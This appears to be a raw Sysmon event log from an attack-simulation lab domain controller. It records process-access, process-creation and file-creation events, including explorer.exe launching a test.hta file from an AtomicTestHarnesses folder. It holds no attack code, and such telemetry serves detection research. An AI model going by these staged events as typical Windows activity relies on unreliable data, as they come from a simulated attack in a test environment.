10341000x800000000000000023929Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.038{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023928Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.038{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023927Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.023{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023926Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.023{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023925Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.023{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023924Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.023{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023923Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.023{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023922Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.023{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023921Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.023{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000023920Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.032{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000023919Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.023{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4206-00000000A301}8020C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023918Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.007{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4206-00000000A301}8020C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023917Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.007{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4206-00000000A301}8020C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023916Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.991{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5359-6008-4206-00000000A301}8020C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023915Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.991{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023914Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.991{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023913Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.991{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023912Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.991{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023911Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.991{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-5359-6008-4206-00000000A301}8020C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023910Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4206-00000000A301}8020C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000023909Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.003{7901BC46-5359-6008-4206-00000000A301}8020C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEexplorer.exe "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000024177Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.569{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024176Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.569{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024175Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.523{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024174Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.523{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000024173Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.476{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yv0n2ezg.emb.ps12021-01-20 15:59:22.476 10341000x800000000000000024172Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.460{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024171Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.429{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-535A-6008-4906-00000000A301}5944C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024170Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.429{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535A-6008-4906-00000000A301}5944C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024169Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.429{7901BC46-535A-6008-4906-00000000A301}59446960C:\Windows\system32\conhost.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024168Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.413{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-535A-6008-4906-00000000A301}5944C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024167Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.413{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024166Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 